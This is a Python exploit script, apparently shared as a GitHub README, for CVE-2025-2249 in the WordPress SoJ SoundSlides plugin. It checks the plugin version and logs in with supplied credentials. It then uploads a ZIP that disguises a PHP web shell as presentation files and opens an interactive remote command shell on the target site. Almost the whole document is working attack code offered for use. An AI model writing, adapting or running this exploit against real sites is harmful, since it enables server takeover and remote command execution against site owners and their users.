README.md
Rendering markdown...
import os
import requests
import zipfile
import argparse
import time
BANNER = """
@@@@@@@ @@@ @@@ @@@@@@@@ @@@@@@ @@@@@@@@ @@@@@@ @@@@@@@ @@@@@@ @@@@@@ @@@ @@@@@@
@@@@@@@@ @@@ @@@ @@@@@@@@ @@@@@@@@ @@@@@@@@@@ @@@@@@@@ @@@@@@@ @@@@@@@@ @@@@@@@@ @@@@ @@@@@@@@
!@@ @@! @@@ @@! @@@ @@! @@@@ @@@ !@@ @@@ @@@ @@!@! @@! @@@
!@! !@! @!@ !@! @!@ !@! @!@!@ @!@ !@! @!@ @!@ !@!!@! !@! @!@
!@! @!@ !@! @!!!:! @!@!@!@!@ !!@ @!@ @! !@! !!@ !!@@!! @!@!@!@!@ !!@ !!@ @!! @!! !!@!!@!!
!!! !@! !!! !!!!!: !!!@!@!!! !!: !@!!! !!! !!: @!!@!!! !!!@!@!!! !!: !!: !!! !@! !!@!!!
:!! :!: !!: !!: !:! !!:! !!! !:! !:! !:! !:! :!!:!:!!: !!!
:!: ::!!:! :!: :!: :!: !:! :!: !:! :!: :!: !:::!!::: !:!
::: ::: :::: :: :::: :: ::::: ::::::: :: :: ::::: :::: :: :: ::::: :: ::::: ::: ::::: ::
:: :: : : : :: :: :: : ::: : : : : :: : ::: :: : : :: : ::: :: : ::: ::: : : :
By: Nxploited | Khaled Alenazi
"""
def print_banner():
print(BANNER)
def create_directories():
os.makedirs("nxploit/data", exist_ok=True)
os.makedirs("nxploit/audio", exist_ok=True)
def create_files():
with open("nxploit/index.html", "w") as f:
f.write("<html><body>NXploit Presentation</body></html>")
with open("nxploit/data/data.xml", "w") as f:
f.write("<data><title>NXploit</title></data>")
with open("nxploit/audio/audio.mp3", "w") as f:
f.write("DUMMY_AUDIO_CONTENT")
with open("nxploit/nxploit.php", "w") as f:
f.write("""<?php
if(isset($_GET['cmd'])){
echo "<pre>";
system($_GET['cmd']);
echo "</pre>";
} else {
echo "No command executed.";
}
?>""")
def create_zip(zip_name="nxploit.zip"):
create_directories()
create_files()
with zipfile.ZipFile(zip_name, "w") as zipf:
for root, _, files in os.walk("nxploit"):
for file in files:
filepath = os.path.join(root, file)
arcname = os.path.relpath(filepath, "nxploit")
zipf.write(filepath, arcname=arcname)
print(f"[+] ZIP created: {zip_name}")
def check_version(base_url):
readme_url = base_url + "/wp-content/plugins/soj-soundslides/readme.txt"
print(f"[*] Checking plugin version at {readme_url} ...")
try:
res = requests.get(readme_url, timeout=5)
if res.status_code == 200 and "Stable tag: 1.2.2" in res.text:
print("[+] Vulnerable version 1.2.2 detected.")
return True
elif res.status_code == 200:
print("[!] Plugin found but version not confirmed as vulnerable.")
return False
else:
print("[-] Plugin readme not accessible.")
return False
except Exception as e:
print(f"[!] Error while checking version: {e}")
return False
def interactive_shell(shell_url):
print("[*] Entering interactive shell (type 'exit' to quit):")
while True:
cmd = input("> ").strip()
if cmd.lower() in ["exit", "quit"]:
print("[+] Exiting shell.")
break
try:
res = requests.get(shell_url, params={"cmd": cmd}, timeout=5)
print(res.text)
except Exception as e:
print(f"[!] Error: {e}")
def main():
print_banner()
parser = argparse.ArgumentParser(description="Exploit for CVE-2025-2249 | WordPress SoJ SoundSlides Plugin # By Nxploited | Khaled ALenazi,")
parser.add_argument("-u", "--url", required=True, help="WordPress base URL")
parser.add_argument("-un", "--username", required=True, help="WordPress username")
parser.add_argument("-p", "--password", required=True, help="WordPress password")
args = parser.parse_args()
session = requests.Session()
session.verify = False
requests.packages.urllib3.disable_warnings()
headers = {"User-Agent": "Mozilla/5.0"}
if not check_version(args.url):
print("[!] Exploit attempted, but vulnerable version not confirmed.")
return
login_url = args.url + "/wp-login.php"
login_data = {
"log": args.username,
"pwd": args.password,
"rememberme": "forever",
"wp-submit": "Log In"
}
print("[*] Attempting login ...")
response = session.post(login_url, data=login_data, headers=headers)
if any("wordpress_logged_in" in cookie.name for cookie in session.cookies):
print("[+] Login successful.")
else:
print("[-] Login failed.")
return
zip_name = "nxploit.zip"
if not os.path.exists(zip_name):
create_zip(zip_name)
upload_url = args.url + "/wp-admin/options-general.php?page=soj-soundslides%2Fsoj-soundslides.php"
files = {
"soj-soundslide_ptw_zip": (zip_name, open(zip_name, "rb"), "application/zip")
}
data = {
"soj-soundslide_presentation_name": "nxploit_shell",
"action": "updateSoJSoundslide",
"info_update": "Update options »"
}
print("[*] Uploading shell...")
res = session.post(upload_url, files=files, data=data, headers=headers)
print("[*] Waiting 3 seconds before checking shell ...")
time.sleep(3)
shell_url = f"{args.url}/wp-content/uploads/SoundSlides/nxploit_shell/nxploit.php"
try:
check = session.get(shell_url, headers=headers, timeout=5)
if check.status_code == 200:
print(f"[+] Shell uploaded: {shell_url}")
interactive_shell(shell_url)
else:
print("[-] Shell upload may have failed.")
except Exception as e:
print(f"[!] Error accessing shell: {e}")
if __name__ == "__main__":
main()